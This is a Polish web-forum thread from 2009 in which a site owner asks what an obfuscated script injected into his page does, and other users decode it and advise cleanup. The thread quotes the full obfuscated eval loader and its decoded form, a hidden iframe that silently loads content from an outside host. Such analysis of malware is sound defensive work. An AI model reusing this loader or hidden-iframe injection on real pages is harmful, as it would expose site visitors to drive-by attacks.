Co ta funkcja/skrypt robi?, czy to jakis malware Opcje

[Nookie]

Witam,

mam prosbe, czy ktos moze podpowiedziec, co ponizszy skrypt robi?
Gdyz ostatnio zauwazylem ze dodal sie do kodu strony i wyglada na jakis malware?

[HTML] pobierz, plaintext 
<script language=JavaScript>	function qilnbn51(b){var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,49,30,2,9,48,46,20,60,29,0,0,0,0,0,0,7,22,42,19,57,23,38,41,40,3,31,13,5
6
35,34,16,33,43,10,54,14,51,52,58,17,11,55,0,0,0,0,61,0,62,15,26,50,32,4,5,25,1,2
,45,47,6,37,8,21,27,36,39,59,18,44,53,12,24,0);for(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(229^n&255);n>>=8;j-=2}else{j=6}}}eval(p);}}qilnbn51('udLNiBHrYqhrfm4rANk5PBLNzRvZiBHPONoeYmDdu24MX3yU3sKMI24Po3y1YuoNzNkwI2kPgqDn
N_1KmhrpakdRZknp3oei6xMYTHNR@GdcYvUHuyrK68nR3DNiSxBfmhMYJ4PYmHNoSxUbJ_VpY9wxtv5A
LwmRvU3Jj1udyeXSoSEqkVgZoexRyMXNKw7E91Am4s43oS@@oMAAhNfdDZYBLNz28ShQxMI24Po3LS3U
')
</script>
[HTML] pobierz, plaintext 

lub jakas podpowiedz jak to madrze sprawdzic?

[vokiel]

Ten skrypcik generuje coś takiego:

Kod

"window.status='Done';document.write('<iframe name=3f2c sr‡úÒ££³›ÎΒ¾³ççãËÖËëÏϢώîÞF÷£Ó˺ϧËãÓF÷£Ó˺÷ËãÏÇÓÖÚºª²®²ÖÞˆÍ ə§É,ýý<m˜ˆÈ¸9í-Í=ýl¨¨¸¸‰ü,|ím˜ù-¼|­-XM]íYxH)ݝ¬mí]È)"

a potem to wykonuje przez: eval(p);
Jednak, przynajmniej w ff firebug wywala błąd, widać tu próbę przemycenia ukrytej ramki, ktoś tu hackuje (IMG:http://forum.php.pl/style_emoticons/default/blinksmiley.gif)

[phabas]

lepiej to usuń, zmień hasło do serwera i nie trzymaj go nigdzie zapisanego w systemie tylko co najwyżej na papierze. np. Google może ci zindeksować stronę jako zawirusowaną i ją blokować

[likemandrake]

Kod skryptu został źle przekopiowany. Zadaniem tej ramki jest pobranie czegoś, co świadczy o tym sr... a potem dziwne znaki. A miał to być atrybut src.

Kod

window.status='Done';document.write('<iframe name=3f2c src="http://8speed.info/t/?'+Math.round(Math.random()*26070)+'3f2c'+'" width=237 height=110 style="display:none"></iframe>')

> Nie jest to poprawnie zdekodowane, w każdym razie wygląda to mniej więcej tak. Zastanawia mnie tylko ten fragment przed width, co tam mogło być.

Już jest poprawione (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) kolega miał rację (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) z resztą wystarczyło się domyśleć (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Ten post edytował likemandrake 17.02.2009, 12:38:44

[vokiel]

Kod

ASCII: Â!    =    HEX: C221
natomiast
HEX: 22        =    ASCII: "

Te Â! to miał być cudzysłów kończący src="" i prawdopodobnie jakas spacja, ale chyba nie wyszło do końca (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

W każdym razie usuń, przejrzyj inne skrypty, wywal wszysko, zmień hasła i monitoruj co się dzieje dalej.
Pozdrawiam

[likemandrake]

A najlepiej znajdź przyczynę, jak ten skrypt w ogóle został dolepiony do Twojej strony - nie koniecznie ktoś musiał posiadać hasło do Twojego konta hostingowego, czy co tam masz.